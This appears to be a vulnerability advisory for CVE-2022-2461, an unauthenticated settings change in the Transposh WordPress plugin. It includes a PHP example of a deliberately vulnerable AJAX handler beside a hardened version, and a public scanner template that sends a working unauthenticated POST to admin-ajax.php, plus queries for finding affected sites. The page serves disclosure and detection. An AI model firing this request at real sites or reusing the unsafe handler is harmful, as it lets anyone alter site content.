CVE-2022-2461: Transposh WordPress Translation <= 1.0.8 - Unauthenticated Settings Change

Date: 2025-08-01 | Affected software: Transposh WordPress Translation | PoC: public

Vulnerability description

The Transposh WordPress Translation plugin for WordPress is vulnerable to unauthorized setting changes by unauthenticated users in versions up to, and including, 1.0.8.1. This is due to insufficient permissions checking on the 'tp_translation' AJAX action, combined with the plugin's default settings, which makes it possible for unauthenticated attackers to influence the data shown on the site.
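The root cause is a CWE-862 pattern: a WordPress AJAX action exposed through the `wp_ajax_nopriv_*` hook that stores request data without checking who is calling. The following is an added illustration of that pattern beside its hardened form; it is not Transposh's code, and the hook names, option key, nonce name and parameter names are hypothetical.

```php
<?php
// Added illustration, not Transposh's code. Hook names, option key, nonce
// action and parameter names (items, tk<n>, tr<n>) are hypothetical.

// --- Vulnerable pattern ---
// wp_ajax_nopriv_* fires for requests with no logged-in user, so anyone who
// can reach /wp-admin/admin-ajax.php can invoke this handler. Nothing here
// verifies a capability or a nonce before writing to the database.
add_action( 'wp_ajax_nopriv_example_translation', 'example_translation_unsafe' );
add_action( 'wp_ajax_example_translation',        'example_translation_unsafe' );

function example_translation_unsafe() {
    $items = isset( $_POST['items'] ) ? (int) $_POST['items'] : 0;
    for ( $i = 0; $i < $items; $i++ ) {
        $source = $_POST[ "tk$i" ] ?? '';
        $target = $_POST[ "tr$i" ] ?? '';
        // Unauthenticated, unsanitized write: this is the CWE-862 defect.
        update_option( 'example_translation_' . md5( $source ), $target );
    }
    wp_send_json_success( 'stored' );
}

// --- Hardened pattern ---
// 1. Register only the authenticated wp_ajax_* hook; an anonymous entry point
//    should exist only as a deliberate feature with its own safeguards.
// 2. Require a capability: wp_ajax_* alone proves the caller is logged in,
//    not that they are allowed to change site content.
// 3. Verify a nonce so a logged-in editor cannot be driven by a forged request.
// 4. Sanitize and bound the input before storing it.
add_action( 'wp_ajax_example_translation_v2', 'example_translation_safe' );

function example_translation_safe() {
    check_ajax_referer( 'example_translation_nonce', 'nonce' ); // dies on a bad or missing nonce
    if ( ! current_user_can( 'edit_posts' ) ) {                 // use the narrowest capability that fits
        wp_send_json_error( 'forbidden', 403 );
    }
    $items = isset( $_POST['items'] ) ? min( (int) $_POST['items'], 100 ) : 0;
    for ( $i = 0; $i < $items; $i++ ) {
        $source = sanitize_text_field( wp_unslash( $_POST[ "tk$i" ] ?? '' ) );
        $target = sanitize_text_field( wp_unslash( $_POST[ "tr$i" ] ?? '' ) );
        if ( '' === $source || '' === $target ) {
            continue;
        }
        update_option( 'example_translation_' . md5( $source ), $target );
    }
    wp_send_json_success( 'stored' );
}
```

When reviewing a plugin for this class of bug, list every `wp_ajax_nopriv_` registration and confirm each handler either needs no trust at all or performs its own authorization and nonce check.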

PoC code [public]

id: CVE-2022-2461

info:
  name: Transposh WordPress Translation <= 1.0.8 - Unauthenticated Settings Change
  author: riteshs4hu
  severity: medium
  description: |
    The Transposh WordPress Translation plugin for WordPress is vulnerable to unauthorized setting changes by unauthenticated users in versions up to, and including, 1.0.8.1. This is due to insufficient permissions checking on the 'tp_translation' AJAX action and default settings which makes it possible for unauthenticated attackers to influence the data shown on the site.
  impact: |
    Unauthenticated attackers can modify plugin settings through the tp_translation AJAX endpoint without authentication, potentially manipulating translated content and injecting malicious data that affects all site visitors.
  remediation: |
    Update Transposh WordPress Translation plugin to a version newer than 1.0.8.1 that implements proper authentication checks on AJAX actions.
  reference:
    - https://wpscan.com/vulnerability/56a961b0-66b7-4dbf-a0e4-0cd38c9aa8dd/
    - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2022-2461.txt
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/223373fc-9d78-47f0-b283-109f8e00b802?source=cve
    - https://www.wordfence.com/vulnerability-advisories/#CVE-2022-2461
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-2461
    cwe-id: CWE-862
    epss-score: 0.13263
    epss-percentile: 0.93955
    cpe: cpe:2.3:a:transposh:transposh_wordpress_translation:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: transposh
    product: transposh_wordpress_translation
    framework: wordpress
    publicwww-query: "/wp-content/plugins/transposh-translation-filter-for-wordpress/"
    fofa-query: body="/wp-content/plugins/transposh-translation-filter-for-wordpress/"
  tags: cve,cve2022,wordpress,wp-plugin,wp,wpscan,transposh-translation-filter-for-wordpress,info-leak,vkev,vuln

variables:
  redirect_uri: "oast.me"

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=tp_translation&ln0=en&sr0={{redirect_uri}}&items=1&tk0={{redirect_uri}}&tr0={{redirect_uri}}

    matchers:
      - type: dsl
        dsl:
          - "contains(body, '200 - backup in sync')"
          - "contains(content_type, 'text/html')"
          - "status_code == 200"
        condition: and

    extractors:
      - type: regex
        part: header
        regex:
          - "Transposh: v-[0-9.]+"
# digest: 490a0046304402201d12bb2dac1b4faecfef9a22376a197e1d49f52e1f30f11a8d7f8e83bdef2c9b02202f5ad8c37c3d2019708214ac3f241332a320408be9cf94aaa71a5078f1e04699:922c64590222798bb761d5b6d8e72950
